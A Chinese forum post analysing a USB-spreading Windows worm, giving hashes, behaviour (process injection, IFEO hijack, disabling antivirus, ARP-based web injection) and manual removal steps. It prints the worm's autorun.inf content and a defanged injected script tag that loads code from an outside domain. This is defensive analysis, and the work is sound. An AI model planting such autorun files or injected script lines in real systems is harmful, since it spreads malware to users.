昨晚``5月28日收到的样本``一个MM电脑上抓过来的```早上跟踪了下``

呼```又更新了``头疼````````

以前写的分析:

======================================================

Aditional Information

File size: 36435 bytes
MD5: 23d80e8e5c2b7eb19e006e80c9bd4bfb
SHA1: e760703c8776c652b424fa62af945434fb786be5
CRC32    : 9511CA27
RIPEMD160: E78A1F72018D954CF51E08CDC0A1EFAE9F0CD57C
HAVAL(128bit,pass=5): 8AF756D5E8FB386439C81D694B04095E
packers: UPX
Language:Borland Delphi 6.0 - 7.0

======================================================

病毒行为(简单写了```):

1、病毒是一个8位随机数组成的（0—F），其实是本身机子的机器码。运行后释放同名的Dll文件，设置系统全局挂勾。后枚举进程，插入TIMPlatform.exe和Explorer.exe进程（如果有）

Dll的文件在C:\Program Files\Common Files\MicrosoftShared\MSInfo\下，目录下还有个同名的dat文件```

最后还释放了一个.hlp(系统帮助文件），在%Windir%\help\下，44字节的，属性为存档```

（dll文件48723 字节，dat的36435 字节，属性为系统-隐藏-只读）````

 

2、插入进程的随机8位数.dll检测窗口句柄，并关闭列入病毒名单的“关键字”一些冷门的工具也不放过`````

 

3、修改IFEO重定向劫持，指向的是：C:\Program Files\Common Files\MicrosoftShared\MSInfo\的Dat文件。

 

4、破坏安全模式和显示隐藏文件，达到自身防护的目的。

 

5、释放一个Dl1.exe，创建远程线程并调用IE下载木马，下了一大推，乱乱的````

 

6、（遍历）每个分区，在跟目录下生成Autorun.inf和随机8位的EXE，达到双击硬盘激活病毒。

Autorun.inf内容为：

[AutoRun]
open=随机8位数.exe
shell\open=打开(&O)
shell\open\Command=随机8位数.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=随机8位数.exe

 

7、依附宿主的随机8位Dll每隔一段时间刷新，检测自身释放的“同党”和修改的注册表项，如果被修改和删除的话即使其恢复。并监视移动介质盘插入，支持U盘传播`````````

 

8、修改安全工具（杀软）服务和驱动的启动类型，设置为禁用，并删除其RUN启项，最后还挂了系统自带的防火墙``

 

9、用安全工具（如果能打开）检测宿主模块时，那么它则卸掉自身，安全工具退出（关闭）时，重新注入。

 

10、"病毒版本"：在C:\Program Files和C:\WINNT\system32\DirectX，释放一个.ini的文本，里面生成病毒的版本``我生成的是525，也就是5.25日更新的版本。

 

11、局域ARP挂马````比较“旁门”的技术（开始有点佩服作者）由外部下载的病毒ycnt9.exe，释放的win1ogo.exe，由它监听局域，每5秒刷新从自身机子（被感染的）经过的ARP数据包，并插入一短Js代码`````

代码内容为：

"<script language=javascript src=h**p://google.171738.org/ad2.js></script>"

呵呵，我把Http改为H**p。嗅探范围：192.168.0.1-192.168.0.254，这意味着经过该被感染机子的数据包返回时，是一段被挂马的数据包！！！说简单点就是你浏览的所有网页上都有病毒。后来我点入该网址，是个MD5一样的8位随机病毒，呵呵，病毒名字为“hello.exe”。

这可比访问局域穷举猜口令轻松多了，这也是我佩服作者的地方。````（有点贬义）`

 

12、常驻进程的随机8位数.dll每毫秒刷新，尝试拦截FindWindowExA、mouse_event等信息函数，修改映像命令，发送“假情报”`````向瑞星注册表监控捕捉发送“允许”命令`（不经过用户操作）``````

解决方案：

先到[url]http://free.ys168.com/?gudugengkekao[/url]下载工具

SREng、冰刃、PowerRMV 、autoruns、unlocker1.8.5.exe、“显示隐藏文件”（注册表）和“修复安全模式”（注册表）

直接放桌面，后断开网络（这点很重要）然后按步骤```

 

1、打开冰刃(改名了吧？！），结束一个8位数字的EXE文件（如有看到，没有则忽略）然后用冰刃的“文件”功能```展开到C:\Program Files\Common Files\Microsoft Shared\MSINFO\下````删除2个8位随机数字的文件。扩展名分别为：dat 和dll````再到%windir%\help\删除同名的.hlp（系统帮助文件图标````大小为44字节）

 

2、这时候所有安全工具等都可以打开了，首先打开PowerRMV，填入：（一次一个，找不到的忽略）

C:\autorun.inf         D:\autorun.inf         E:\autorun.inf         F:\autorun.inf

 

3、还有autorun.inf指向的病毒，扩展名为exe的。也一并删除！！

 

4、打开autoruns(改名了吧？！）删除IFEO劫持项``挨个删```

 

5、下载的SREng，删除下面的：（不一定全）

注册表

<testrun><C:\DOCUME~1\admin\LOCALS~1\Temp\testexe.exe>  []
    <Kvsc><C:\winnt\Kvsc3.exe>  []
    <msccrt><C:\winnt\msccrt.exe>  []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    <MSDEG32><LYLoader.exe>  []
    <MSDWG32><LYLoadbr.exe>  [N/A]
    <MSDCG32    ><LYLeador.exe>  [N/A]
    <MSDOG32><LYLoador.exe>  [N/A]
    <MSDSG32><LYLoadar.exe>  [N/A]
    <MSDMG32><LYLoadmr.exe>  [N/A]
    <MSDHG32><LYLoadhr.exe>  [N/A]
    <MSDQG32><LYLoadqr.exe>  [N/A]

服务

[Win32 Display Driver / Win32DDS][Stopped/Auto Start]
  <C:\winnt\system32\rundll32.exe windds32.dll,input><Microsoft Corporation>
[Win32 Debug Service / MSDebugsvc][Stopped/Auto Start]
  <C:\winnt\system32\rundll32.exe msdebug.dll,input><Microsoft Corporation>

驱动程序

 

[Netgroup Packet Filter / NPF][Running/Manual Start]
  <system32\drivers\npf.sys><CACE Technologies>

 

还有些其他Dll的病毒文件，不记得那么许多了```（后面再用杀软解决）

 

 

上面做完后重装下杀软（技术硬的话，自己重写回注册表，和设置其启动类型），升级最高版本，全盘扫。

======================================================
后话：
古人为什么推崇“德才兼备”？那只是因为有才没德的人，危害更大！！！！！！！
孤独更可靠真诚希望病毒的作者能因此停止更新，学技术是为了帮助更多的人……而不是“搞破坏”````珍惜身边那些关心你的人`````

另附上一些连接：
[url]http://www.antivirus-china.org.cn/law/f3.htm[/url]
[url]http://www.antivirus-china.org.cn/law/f2.htm[/url]
[url]http://www.antivirus-china.org.cn/law/fagui.htm[/url]
[url]http://tech.163.com/07/0312/18/39DEG9K1000915BF.html[/url]
[url]http://www.infosec.org.cn/news/news_detail.php?mID=8845[/url]

 

一些图：